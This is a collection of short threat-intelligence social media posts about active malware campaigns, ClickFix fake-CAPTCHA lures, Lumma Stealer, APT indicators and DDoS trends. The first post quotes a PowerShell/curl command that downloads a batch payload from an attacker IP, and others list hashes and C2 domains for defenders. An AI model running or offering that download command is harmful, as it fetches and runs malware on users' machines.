JAMESWT

#booking #clickfix #fakecaptcha visitor31740].help 👇 powershell -c "Invoke-WebRequest -Uri '95.164.55.]176:5554/kalik.bat' 👇curl 95.164.55.176:5554 👇 kalik.bat 👇 JPERGDUP.msi STZIAZID.msi Samples bazaar.abuse.ch/browse/tag/95-… AnyRun app.any.run/tasks/65aa50fa… cc @500mk500 @k3dg3

#BREAKING #ESETresearch can confirm the news of #Lumma Stealer's revival. ESET telemetry and botnet tracking show that operators are rebuilding their infrastructure, with their renewed activity reaching similar levels to those before the #disruption in May 2025. 1/6

#Broadcom patches critical #VMware flaws exploited at #Pwn2Own #Berlin 2025 securityaffairs.com/180062/securit… #securityaffairs #hacking

🚨 SCOTUS Backs Texas Porn ID Law In “Free Speech Coalition v. Paxton”, the Court upheld Texas’s law forcing porn sites to verify users' ages via gov’t ID, turning them into surveillance hubs. Proof of age now means loss of #privacy. A starting point: securityboulevard.com/2025/07/prove-……

Read more in the #ESETThreatReport: 🔗 welivesecurity.com/en/eset-resear… 7/7

#ClickFix went from virtually non-existent to the second most common attack vector blocked by #ESET, surpassed only by #phishing. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. #ESETresearch 1/7

CERT-AgID e il gran bazar di #malware computersecuritynews.it/cert-agid-e-il…

Sintesi riepilogativa delle campagne malevole nella settimana del 12 – 18 luglio 2025 💣 #IoC 875 🦠 #Malware 18 (famiglie) 🐟 #Phishing 14 (brand) ℹ️ Ulteriori approfondimenti 👇 🔗 cert-agid.gov.it/news/sintesi-r…

#SideCopy #APT #Phishing Tour Programme Ayodhya.pdf.lnk c59efe3739ae3e2814ff48f41b0d0ad8 ompowerterminus[.]com SVNUpdates #MSI 4cc0cc070ec8a51b437ddc393487bb7e DUI70.dll #CurlBackRAT f4a82380cc0e246a4f576bc81fa6f879 #C2 backup[.]intelupates[.]com #APT36 #TransparentTribe

⚠️ fake Telegram Apps target Android users 607 domains mimic #Telegram to spread #malware via blog-style sites & QR codes. Laced APKs exploit Janus vuln (CVE-2017-13156), enabling remote control. Hosted in China, this campaign abuses old flaws with modern phishing. Read more on…

Another #DarkWatchMan campaign began on 15th June, with multiple waves over the following two days 🔥 DarkWatchMan is still written to disk by a .NET dropper. It also uses the same C2 and DGA as the 29th April campaign (the array contains the same initial strings for domains,…

#Upcrypter 🇧🇷📝

Pro tip: If you receive a screen saver named "Coinbase_incident_report.scr"* you shouldn't run it. *file format SCR is identical to EXE -- Disguised as PDF Code-signed by "GeoTech-IT Oy". h/t @g0njxa also uploaded to MB by @JAMESWT_WT ❤️ 🔗🧵

I haven't seen macro in a long time #Formbook app.any.run/tasks/b284e691…

🚨 A single DDoS attack just peaked at 7.3 Tbps—in 45 seconds. Cloudflare says hyper-volumetric attacks are exploding, with ransom threats up 68%. Botnets like DemonBot are turning unsecured IoT into weapons. Here’s what’s happening → thehackernews.com/2025/07/hyper-…